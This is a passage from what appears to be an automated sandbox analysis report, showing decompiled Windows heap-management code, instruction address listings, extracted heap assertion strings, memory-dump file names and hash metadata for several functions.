													_t330 =  *(_t333 + 0x4c);
													_v32 = _t330;
													__eflags = _t249 & _t330;
													if((_t249 & _t330) != 0) {
														_t249 = _t249 ^  *(_t333 + 0x50);
														__eflags = _t249;
													}
													_t220 = _t249 & 0x0000ffff;
												}
												_t221 = _v8 & 0x0000ffff;
												_v36 = _t221;
												__eflags = _t221 - (_t220 & 0x0000ffff);
												_t223 = _v20;
												if(_t221 - (_t220 & 0x0000ffff) > 0) {
													L73:
													_v16 = _t223;
													goto L40;
												} else {
													_t323 = _v32;
													_t225 =  *_t223 - 8;
													__eflags = _t323;
													if(_t323 == 0) {
														_t226 =  *_t225 & 0x0000ffff;
													} else {
														_t248 =  *_t225;
														_t323 =  *(_t333 + 0x4c);
														__eflags = _t248 & _t323;
														if((_t248 & _t323) != 0) {
															_t248 = _t248 ^  *(_t333 + 0x50);
															__eflags = _t248;
														}
														_t226 = _t248 & 0x0000ffff;
													}
													__eflags = _v36 - (_t226 & 0x0000ffff);
													if(_v36 - (_t226 & 0x0000ffff) <= 0) {
														_t223 =  *_v20;
														goto L73;
													} else {
														_t229 = _v12;
														__eflags =  *_t229;
														if( *_t229 != 0) {
															L84:
															_t230 = _v12;
															_t348 = _t299 >> 5;
															_t277 =  *((intOrPtr*)(_t230 + 0x1c)) + _t348 * 4;
															_t327 = ( *((intOrPtr*)(_t230 + 4)) -  *_t276 >> 5) - 1;
															_t237 =  !((1 << (_t299 & 0x0000001f)) - 1) &  *_t277;
															__eflags = 1;
															if(1 != 0) {
																L88:
																__eflags = _t237 & 0x0000ffff;
																if((_t237 & 0x0000ffff) == 0) {
																	_t304 = _t237 >> 0x00000010 & 0x000000ff;
																	__eflags = _t304;
																	if(_t304 != 0) {
																		_t163 = _t304 + 0xb537f8; // 0x10008
																		_t239 = ( *_t163 & 0x000000ff) + 0x10;
																	} else {
																		_t162 = (_t237 >> 0x18) + 0xb537f8; // 0x10008
																		_t239 = ( *_t162 & 0x000000ff) + 0x18;
																	}
																} else {
																	_t329 = _t237 & 0x000000ff;
																	__eflags = _t329;
																	if(_t329 == 0) {
																		_t161 = (_t237 >> 0x00000008 & 0x000000ff) + 0xb537f8; // 0x10008
																		_t239 = ( *_t161 & 0x000000ff) + 8;
																	} else {
																		_t154 = _t329 + 0xb537f8; // 0x10008
																		_t239 =  *_t154 & 0x000000ff;
																	}
																}
																_t350 = (_t348 << 5) + _t239;
																_t240 = _v12;
																__eflags =  *(_t240 + 8);
																_t305 = _t350 + _t350;
																if( *(_t240 + 8) == 0) {
																	_t305 = _t350;
																}
																_t223 =  *( *((intOrPtr*)(_t240 + 0x20)) + _t305 * 4);
																goto L73;
															} else {
																goto L85;
															}
															while(1) {
																L85:
																__eflags = _t348 - _t327;
																if(_t348 > _t327) {
																	break;
																}
																_t277 =  &(_t277[2]);
																_t237 =  *_t277;
																_t348 = _t348 + 1;
																__eflags = _t237;
																if(_t237 == 0) {
																	continue;
																}
																break;
															}
															__eflags = _t237;
															if(_t237 == 0) {
																_v16 = _v16 & 0x00000000;
																L40:
																_t211 = _v16;
																__eflags = _t211;
																if(_t211 == 0) {
																	_t210 =  *_v12;
																	_t333 = _a4;
																	_t276 = _t210 + 0x14;
																	_t298 =  *_t276;
																	_v24 = _t298;
																	_t320 =  *(_t210 + 0x18);
																	_t299 = _t298 -  *_t276;
																	_v12 = _t210;
																	_t218 =  *((intOrPtr*)(_t320 + 4));
																	_v20 = _t320;
																	__eflags = _t320 - _t218;
																	if(_t320 == _t218) {
																		goto L79;
																	}
																	goto L18;
																}
																L41:
																_t319 = _a4;
																_t77 = _t319 + 0xc4; // 0xc4
																__eflags = _t77 - _t211;
																if(_t77 == _t211) {
																	L48:
																	_t286 =  *(_t211 + 4);
																	_t270 =  *_t286;
																	_t331 =  &(_t354[4]);
																	__eflags = _t270 - _t211;
																	if(__eflags != 0) {
																		_push(0);
																		_push(_t270);
																		_push(0);
																		_push(_t211);
																		_push(0);
																		_push(0xc);
																		E00BEF840(_t270, 0, _t319, _t331, _t354, __eflags);
																		_t318 = _a4;
																	} else {
																		 *_t331 = _t211;
																		 *(_t331 + 4) = _t286;
																		 *_t286 = _t331;
																		 *(_t211 + 4) = _t331;
																	}
																	 *((intOrPtr*)(_t318 + 0x78)) =  *((intOrPtr*)(_t318 + 0x78)) + ( *_t354 & 0x0000ffff);
																	_t197 =  *(_t318 + 0xb8);
																	__eflags = _t197;
																	if(_t197 == 0) {
																		L66:
																		if( *(_t318 + 0x4c) != 0) {
																			_t354[1] = _t354[0] ^ _t354[1] ^  *_t354;
																			 *_t354 =  *_t354 ^  *(_t318 + 0x50);
																		}
																		_t200 = _v8 & 0x0000ffff;
																		_a12 = _a12 - _t200;
																		_t266 = _v8 & 0x0000ffff;
																		_t354 = _t354 + _t200 * 8;
																		_t201 = _v28;
																		if(_t354 >=  *((intOrPtr*)(_t201 + 0x28))) {
																			L71:
																			return _t201;
																		} else {
																			goto L69;
																		}
																	} else {
																		_t291 =  *_t354 & 0x0000ffff;
																		while(1) {
																			__eflags = _t291 -  *((intOrPtr*)(_t197 + 4));
																			if(_t291 <  *((intOrPtr*)(_t197 + 4))) {
																				break;
																			}
																			_t343 =  *_t197;
																			__eflags = _t343;
																			if(_t343 != 0) {
																				_t197 = _t343;
																				continue;
																			}
																			_t291 =  *((intOrPtr*)(_t197 + 4)) - 1;
																			__eflags = _t291;
																			break;
																		}
																		_v32 = _t291;
																		_t282 = _t291 -  *((intOrPtr*)(_t197 + 0x14));
																		__eflags =  *(_t197 + 8);
																		_v20 = _t282;
																		_t335 = _t282 + _t282;
																		if( *(_t197 + 8) == 0) {
																			_t335 = _t282;
																		}
																		 *((intOrPtr*)(_t197 + 0xc)) =  *((intOrPtr*)(_t197 + 0xc)) + 1;
																		_t336 = _t335 << 2;
																		_v36 = _t336;
																		_v24 =  *(_t336 +  *(_t197 + 0x20));
																		__eflags = _v32 -  *((intOrPtr*)(_t197 + 4)) - 1;
																		if(_v32 ==  *((intOrPtr*)(_t197 + 4)) - 1) {
																			_t107 = _t197 + 0x10;
																			 *_t107 =  *(_t197 + 0x10) + 1;
																			__eflags =  *_t107;
																		}
																		_t340 = _v24;
																		__eflags = _t340;
																		if(_t340 == 0) {
																			L64:
																			_t331 =  *(_t197 + 0x20);
																			 *(_v36 +  *(_t197 + 0x20)) =  &(_t354[4]);
																			_t282 = _v20;
																			goto L65;
																		} else {
																			__eflags =  *(_t318 + 0x4c);
																			if( *(_t318 + 0x4c) == 0) {
																				_t341 =  *(_t340 - 8) & 0x0000ffff;
																			} else {
																				_t342 =  *(_t340 - 8);
																				__eflags =  *(_t318 + 0x4c) & _t342;
																				if(( *(_t318 + 0x4c) & _t342) != 0) {
																					_t342 = _t342 ^  *(_t318 + 0x50);
																					__eflags = _t342;
																				}
																				_t341 = _t342 & 0x0000ffff;
																			}
																			_t331 = _t341 & 0x0000ffff;
																			__eflags = ( *_t354 & 0x0000ffff) - (_t341 & 0x0000ffff);
																			if(( *_t354 & 0x0000ffff) - (_t341 & 0x0000ffff) > 0) {
																				L65:
																				__eflags = _v24;
																				if(_v24 == 0) {
																					 *( *((intOrPtr*)(_t197 + 0x1c)) + (_t282 >> 5) * 4) =  *( *((intOrPtr*)(_t197 + 0x1c)) + (_t282 >> 5) * 4) | 1 << (_t282 & 0x0000001f);
																					_t318 = _a4;
																				}
																				goto L66;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																_t344 =  *(_t319 + 0x4c);
																while(1) {
																	__eflags = _t344;
																	if(_t344 == 0) {
																		_t294 =  *(_t211 - 8) & 0x0000ffff;
																	} else {
																		_t297 =  *(_t211 - 8);
																		_t344 =  *(_t319 + 0x4c);
																		__eflags = _t297 & _t344;
																		if((_t297 & _t344) != 0) {
																			_t297 = _t297 ^  *(_t319 + 0x50);
																			__eflags = _t297;
																		}
																		_t294 = _t297 & 0x0000ffff;
																	}
																	__eflags = (_v8 & 0x0000ffff) - (_t294 & 0x0000ffff);
																	if((_v8 & 0x0000ffff) <= (_t294 & 0x0000ffff)) {
																		goto L48;
																	}
																	_t211 =  *_t211;
																	_t189 = _t319 + 0xc4; // 0xc4
																	__eflags = _t189 - _t211;
																	if(_t189 == _t211) {
																		goto L48;
																	}
																}
																goto L48;
															}
															goto L88;
														}
														__eflags = _v24 - _t229[2] - 1;
														if(_v24 != _t229[2] - 1) {
															goto L84;
														}
														__eflags = _t229[4];
														if(_t229[4] != 0) {
															_t299 = _t299 + _t299;
															__eflags = _t299;
														}
														_t223 =  *(_t229[0x10] + _t299 * 4);
														__eflags = _v20 - _t223;
														if(_v20 == _t223) {
															goto L40;
														} else {
															_t353 = _a4;
															while(1) {
																__eflags = _t323;
																if(_t323 == 0) {
																	_t307 =  *(_t223 - 8) & 0x0000ffff;
																} else {
																	_t310 =  *(_t223 - 8);
																	_t323 =  *(_t353 + 0x4c);
																	__eflags = _t310 & _t323;
																	if((_t310 & _t323) != 0) {
																		_t310 = _t310 ^  *(_t353 + 0x50);
																		__eflags = _t310;
																	}
																	_t307 = _t310 & 0x0000ffff;
																}
																__eflags = (_v8 & 0x0000ffff) - (_t307 & 0x0000ffff);
																if((_v8 & 0x0000ffff) - (_t307 & 0x0000ffff) <= 0) {
																	goto L73;
																}
																_t223 =  *_t223;
																__eflags = _v20 - _t223;
																if(_v20 != _t223) {
																	continue;
																}
																goto L40;
															}
															goto L73;
														}
													}
												}
												L79:
												_v16 = _t320;
												goto L40;
											}
										}
									}
									_t298 = _t269;
									_v24 = _t269;
									goto L16;
								}
							}
							__eflags = _t268 - 0xfe;
							if(__eflags >= 0) {
								goto L113;
							}
						}
						goto L11;
						L69:
					} while (_a12 != 0);
					_t201 =  *(_a4 + 0x54) ^ _v8;
					_t354[2] = _t201;
					if(_v8 == 0) {
						__eflags =  *0xc277b0 - 1;
						if( *0xc277b0 >= 1) {
							_t201 =  &(_t354[0x7ff]) & 0xfffff000;
							__eflags = _t201 - _t354;
							if(_t201 != _t354) {
								_t257 =  *( *[fs:0x18] + 0x30);
								__eflags =  *(_t257 + 0xc);
								if( *(_t257 + 0xc) == 0) {
									_push("HEAP: ");
									E00B9373B();
								} else {
									E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
								}
								_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
								E00B9373B();
								_t201 = E00BEF826(_t266, _t318, _t331, _t354, 1);
							}
						}
					}
					goto L71;
				}
			}











































































                                                        0x00b5735f
                                                        0x00b57678
                                                        0x00b57365
                                                        0x00b57365
                                                        0x00b57366
                                                        0x00b57367
                                                        0x00b5736e
                                                        0x00b5736f
                                                        0x00b57376
                                                        0x00b57379
                                                        0x00b5737c
                                                        0x00b89e61
                                                        0x00b89e68
                                                        0x00b9da67
                                                        0x00b9da6b
                                                        0x00b9da77
                                                        0x00b9da7c
                                                        0x00b9da7e
                                                        0x00b9da84
                                                        0x00b9da8a
                                                        0x00b9da8d
                                                        0x00b9da91
                                                        0x00b9dab3
                                                        0x00b9dab8
                                                        0x00b9da93
                                                        0x00b9da99
                                                        0x00b9da9f
                                                        0x00b9daab
                                                        0x00b9dab0
                                                        0x00b9dab0
                                                        0x00b9dabd
                                                        0x00b9dabe
                                                        0x00b9dac3
                                                        0x00b9dac8
                                                        0x00b9dacb
                                                        0x00b9dacb
                                                        0x00b9da7e
                                                        0x00b9da6b
                                                        0x00b89e68
                                                        0x00b57382
                                                        0x00b57385
                                                        0x00b57387
                                                        0x00b57691
                                                        0x00b5738d
                                                        0x00b5738d
                                                        0x00b57390
                                                        0x00b57392
                                                        0x00b5739a
                                                        0x00b5739c
                                                        0x00b5739c
                                                        0x00b573a1
                                                        0x00b573a1
                                                        0x00b573a4
                                                        0x00b573a7
                                                        0x00b573aa
                                                        0x00b573af
                                                        0x00b573b2
                                                        0x00b84be6
                                                        0x00b84bed
                                                        0x00b84bf0
                                                        0x00b9dad5
                                                        0x00b9dad5
                                                        0x00b84bf6
                                                        0x00b573b8
                                                        0x00b573bc
                                                        0x00b573c2
                                                        0x00b573c2
                                                        0x00b573c5
                                                        0x00b573cf
                                                        0x00b573d3
                                                        0x00b573d6
                                                        0x00b573d9
                                                        0x00b573db
                                                        0x00b57699
                                                        0x00b573e1
                                                        0x00b573e8
                                                        0x00b573e9
                                                        0x00b573eb
                                                        0x00b9dae1
                                                        0x00b9dae1
                                                        0x00b9dae3
                                                        0x00b9dae5
                                                        0x00b9dae6
                                                        0x00b9dae7
                                                        0x00b9dae8
                                                        0x00b9daea
                                                        0x00b573fd
                                                        0x00b573fd
                                                        0x00b57400
                                                        0x00b57404
                                                        0x00b57407
                                                        0x00b5740a
                                                        0x00b5740e
                                                        0x00b57412
                                                        0x00b57416
                                                        0x00b57419
                                                        0x00b9db05
                                                        0x00b9db0a
                                                        0x00b9db0a
                                                        0x00b5741f
                                                        0x00b57425
                                                        0x00b57427
                                                        0x00b6e26a
                                                        0x00000000
                                                        0x00b5742d
                                                        0x00b5742d
                                                        0x00b5742d
                                                        0x00b57430
                                                        0x00000000
                                                        0x00000000
                                                        0x00b57436
                                                        0x00b57438
                                                        0x00b5743a
                                                        0x00b57683
                                                        0x00000000
                                                        0x00b57440
                                                        0x00b57443
                                                        0x00b57443
                                                        0x00b57444
                                                        0x00b57447
                                                        0x00b57447
                                                        0x00b5744a
                                                        0x00b5744a
                                                        0x00b5744d
                                                        0x00b5744f
                                                        0x00b57452
                                                        0x00b57455
                                                        0x00b57458
                                                        0x00b5745a
                                                        0x00000000
                                                        0x00000000
                                                        0x00b57460
                                                        0x00b57460
                                                        0x00b57463
                                                        0x00b57466
                                                        0x00b57468
                                                        0x00b89eea
                                                        0x00b5746e
                                                        0x00b5746e
                                                        0x00b57471
                                                        0x00b57474
                                                        0x00b57477
                                                        0x00b57479
                                                        0x00b5747b
                                                        0x00b5747b
                                                        0x00b5747b
                                                        0x00b5747e
                                                        0x00b5747e
                                                        0x00b57484
                                                        0x00b57488
                                                        0x00b5748d
                                                        0x00b5748f
                                                        0x00b57492
                                                        0x00b5767b
                                                        0x00b5767b
                                                        0x00000000
                                                        0x00b57498
                                                        0x00b5749a
                                                        0x00b5749d
                                                        0x00b574a0
                                                        0x00b574a2
                                                        0x00b89ef3
                                                        0x00b574a8
                                                        0x00b574a8
                                                        0x00b574aa
                                                        0x00b574ad
                                                        0x00b574af
                                                        0x00b574b1
                                                        0x00b574b1
                                                        0x00b574b1
                                                        0x00b574b4
                                                        0x00b574b4
                                                        0x00b574bf
                                                        0x00b574c1
                                                        0x00b83d2b
                                                        0x00000000
                                                        0x00b574c7
                                                        0x00b574c7
                                                        0x00b574ca
                                                        0x00b574cd
                                                        0x00b89d59
                                                        0x00b89d59
                                                        0x00b89d66
                                                        0x00b89d69
                                                        0x00b89d77
                                                        0x00b89d7b
                                                        0x00b89d7b
                                                        0x00b89d7d
                                                        0x00b89d95
                                                        0x00b89d98
                                                        0x00b89d9a
                                                        0x00b89e78
                                                        0x00b89e78
                                                        0x00b89e7e
                                                        0x00b89e92
                                                        0x00b89e99
                                                        0x00b89e80
                                                        0x00b89e83
                                                        0x00b89e8a
                                                        0x00b89e8a
                                                        0x00b89da0
                                                        0x00b89da7
                                                        0x00b89da7
                                                        0x00b89da9
                                                        0x00b89dd7
                                                        0x00b89dde
                                                        0x00b89dab
                                                        0x00b89dab
                                                        0x00b89dab
                                                        0x00b89dab
                                                        0x00b89da9
                                                        0x00b89db5
                                                        0x00b89db7
                                                        0x00b89dba
                                                        0x00b89dbe
                                                        0x00b89dc1
                                                        0x00b9db13
                                                        0x00b9db13
                                                        0x00b89dca
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89d7f
                                                        0x00b89d7f
                                                        0x00b89d7f
                                                        0x00b89d81
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89d83
                                                        0x00b89d86
                                                        0x00b89d88
                                                        0x00b89d89
                                                        0x00b89d8b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89d8b
                                                        0x00b89d8d
                                                        0x00b89d8f
                                                        0x00b89ecc
                                                        0x00b57526
                                                        0x00b57526
                                                        0x00b57529
                                                        0x00b5752b
                                                        0x00b89ed8
                                                        0x00b89eda
                                                        0x00b89edd
                                                        0x00b89ee0
                                                        0x00b89ee2
                                                        0x00b5744a
                                                        0x00b5744d
                                                        0x00b5744f
                                                        0x00b57452
                                                        0x00b57455
                                                        0x00b57458
                                                        0x00b5745a
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b5745a
                                                        0x00b57531
                                                        0x00b57531
                                                        0x00b57534
                                                        0x00b5753a
                                                        0x00b5753c
                                                        0x00b57568
                                                        0x00b57568
                                                        0x00b5756b
                                                        0x00b5756d
                                                        0x00b57570
                                                        0x00b57572
                                                        0x00b9db31
                                                        0x00b9db32
                                                        0x00b9db33
                                                        0x00b9db34
                                                        0x00b9db35
                                                        0x00b9db36
                                                        0x00b9db38
                                                        0x00b9db3d
                                                        0x00b57578
                                                        0x00b57578
                                                        0x00b5757a
                                                        0x00b5757d
                                                        0x00b5757f
                                                        0x00b5757f
                                                        0x00b57585
                                                        0x00b57588
                                                        0x00b5758e
                                                        0x00b57590
                                                        0x00b57624
                                                        0x00b57628
                                                        0x00b57632
                                                        0x00b57638
                                                        0x00b57638
                                                        0x00b5763a
                                                        0x00b5763e
                                                        0x00b57641
                                                        0x00b57645
                                                        0x00b57648
                                                        0x00b5764e
                                                        0x00b57674
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b57596
                                                        0x00b57596
                                                        0x00b57599
                                                        0x00b57599
                                                        0x00b5759c
                                                        0x00000000
                                                        0x00000000
                                                        0x00b5759e
                                                        0x00b575a0
                                                        0x00b575a2
                                                        0x00b5768a
                                                        0x00000000
                                                        0x00b5768a
                                                        0x00b575ab
                                                        0x00b575ab
                                                        0x00000000
                                                        0x00b575ab
                                                        0x00b575ac
                                                        0x00b575af
                                                        0x00b575b2
                                                        0x00b575b6
                                                        0x00b575b9
                                                        0x00b575bc
                                                        0x00b9db45
                                                        0x00b9db45
                                                        0x00b575c2
                                                        0x00b575c8
                                                        0x00b575cb
                                                        0x00b575d1
                                                        0x00b575d8
                                                        0x00b575db
                                                        0x00b575dd
                                                        0x00b575dd
                                                        0x00b575dd
                                                        0x00b575dd
                                                        0x00b575e0
                                                        0x00b575e3
                                                        0x00b575e5
                                                        0x00b5760b
                                                        0x00b5760b
                                                        0x00b57614
                                                        0x00b57617
                                                        0x00000000
                                                        0x00b575e7
                                                        0x00b575e7
                                                        0x00b575eb
                                                        0x00b89f0d
                                                        0x00b575f1
                                                        0x00b575f1
                                                        0x00b575f4
                                                        0x00b575f7
                                                        0x00b575f9
                                                        0x00b575f9
                                                        0x00b575f9
                                                        0x00b575fc
                                                        0x00b575fc
                                                        0x00b57602
                                                        0x00b57607
                                                        0x00b57609
                                                        0x00b5761a
                                                        0x00b5761a
                                                        0x00b5761e
                                                        0x00b54479
                                                        0x00b5447b
                                                        0x00b5447b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b57609
                                                        0x00b575e5
                                                        0x00b57590
                                                        0x00b5753e
                                                        0x00b57541
                                                        0x00b57541
                                                        0x00b57543
                                                        0x00b89f04
                                                        0x00b57549
                                                        0x00b57549
                                                        0x00b5754c
                                                        0x00b5754f
                                                        0x00b57551
                                                        0x00b57553
                                                        0x00b57553
                                                        0x00b57553
                                                        0x00b57556
                                                        0x00b57556
                                                        0x00b57560
                                                        0x00b57562
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9db1a
                                                        0x00b9db1c
                                                        0x00b9db22
                                                        0x00b9db24
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9db2a
                                                        0x00000000
                                                        0x00b57541
                                                        0x00000000
                                                        0x00b89d8f
                                                        0x00b574d7
                                                        0x00b574da
                                                        0x00000000
                                                        0x00000000
                                                        0x00b574e0
                                                        0x00b574e4
                                                        0x00b574e6
                                                        0x00b574e6
                                                        0x00b574e6
                                                        0x00b574eb
                                                        0x00b574ee
                                                        0x00b574f1
                                                        0x00000000
                                                        0x00b574f3
                                                        0x00b574f3
                                                        0x00b574f6
                                                        0x00b574f6
                                                        0x00b574f8
                                                        0x00b89efb
                                                        0x00b574fe
                                                        0x00b574fe
                                                        0x00b57501
                                                        0x00b57504
                                                        0x00b57506
                                                        0x00b57508
                                                        0x00b57508
                                                        0x00b57508
                                                        0x00b5750b
                                                        0x00b5750b
                                                        0x00b57517
                                                        0x00b57519
                                                        0x00000000
                                                        0x00000000
                                                        0x00b5751f
                                                        0x00b57521
                                                        0x00b57524
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b57524
                                                        0x00000000
                                                        0x00b574f6
                                                        0x00b574f1
                                                        0x00b574c1
                                                        0x00b6147c
                                                        0x00b6147c
                                                        0x00000000
                                                        0x00b6147c
                                                        0x00b5744a
                                                        0x00b5743a
                                                        0x00b5ab33
                                                        0x00b5ab35
                                                        0x00000000
                                                        0x00b5ab35
                                                        0x00b57427
                                                        0x00b573f1
                                                        0x00b573f7
                                                        0x00000000
                                                        0x00000000
                                                        0x00b573f7
                                                        0x00000000
                                                        0x00b57650
                                                        0x00b57650
                                                        0x00b57661
                                                        0x00b5766a
                                                        0x00b5766e
                                                        0x00b9db4c
                                                        0x00b9db53
                                                        0x00b9db5f
                                                        0x00b9db64
                                                        0x00b9db66
                                                        0x00b9db72
                                                        0x00b9db75
                                                        0x00b9db79
                                                        0x00b9db9b
                                                        0x00b9dba0
                                                        0x00b9db7b
                                                        0x00b9db93
                                                        0x00b9db98
                                                        0x00b9dba6
                                                        0x00b9dbab
                                                        0x00b9dbb3
                                                        0x00b9dbb3
                                                        0x00b9db66
                                                        0x00b9db53
                                                        0x00000000
                                                        0x00b5766e

                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00B9DAA6, 00B9DB8E
                                                        • HEAP: , xrefs: 00B9DAB3, 00B9DB9B
                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 00B9DBA6
                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 00B9DABE
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                        • API String ID: 0-1657114761
                                                        • Opcode ID: 74e2702ae975d614a6b594ce7f3fd1ee55618874efe027fc8439c6b8b3e00fb0
                                                        • Instruction ID: d75a8b7ba4ea83c22c0a6d4b81692c322d153c2e6e1a4c231ed444f78c8c76f7
                                                        • Opcode Fuzzy Hash: 74e2702ae975d614a6b594ce7f3fd1ee55618874efe027fc8439c6b8b3e00fb0
                                                        • Instruction Fuzzy Hash: 0C02BA70608606CFCB14CF59D484B79B7F1FF54311F2981E9E8458B2A1EB34E989DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B5351F, Relevance: 5.1, Strings: 3, Instructions: 1392COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00BAA48B
                                                        • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 00BAA4AC
                                                        • HEAP: , xrefs: 00BAA498
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-2419525547
                                                        • Opcode ID: cf4834b9702a87102da1f3c317ec7bdb6db6eea53351c4b7cd0b96421a512511
                                                        • Instruction ID: 53fdfd95a8f9a6bacb1b98e31f3efbf3d552248493936ab451775e94bfafbe64
                                                        • Opcode Fuzzy Hash: cf4834b9702a87102da1f3c317ec7bdb6db6eea53351c4b7cd0b96421a512511
                                                        • Instruction Fuzzy Hash: E5C28971A042128FCB18CF19C494A7A77E2FF99701B29C1E9EC6A9B355D730ED41DBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B53040, Relevance: 4.8, Strings: 3, Instructions: 1098COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00BAACB5
                                                        • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 00BAACD9
                                                        • HEAP: , xrefs: 00BAACC2
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                        • API String ID: 0-2419525547
                                                        • Opcode ID: 840cdf82b4806d3d9d68ceaf1587dbd900bd4ea2d7b9df5966e728011eb1d6e5
                                                        • Instruction ID: 12e64884310206e3f66770d12252d4cb6041884e76c063018a533971a353c3d2
                                                        • Opcode Fuzzy Hash: 840cdf82b4806d3d9d68ceaf1587dbd900bd4ea2d7b9df5966e728011eb1d6e5
                                                        • Instruction Fuzzy Hash: 27A29D70904255CFDB29CF64C480BA9BBF1FF49702F1485E9E896AB391D730AD85DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B5C85C, Relevance: 4.6, Strings: 3, Instructions: 858COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 00BADC0F
                                                        • Unable to release memory at %p for %p bytes - Status == %x, xrefs: 00BADC30
                                                        • HEAP: , xrefs: 00BADC1C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
                                                        • API String ID: 0-212623055
                                                        • Opcode ID: 421ea935210868c02782bb01635b0c671afefac10f6d61824712c346d06b7dd5
                                                        • Instruction ID: b448e4caeaea23db760670b5ceb70194d9419954411b672e0c8e95a03a57c801
                                                        • Opcode Fuzzy Hash: 421ea935210868c02782bb01635b0c671afefac10f6d61824712c346d06b7dd5
                                                        • Instruction Fuzzy Hash: FC72FE709042599FDB25CFA8C881BBDBBF1FF09311F1480D9E896AB691D334A949DF60
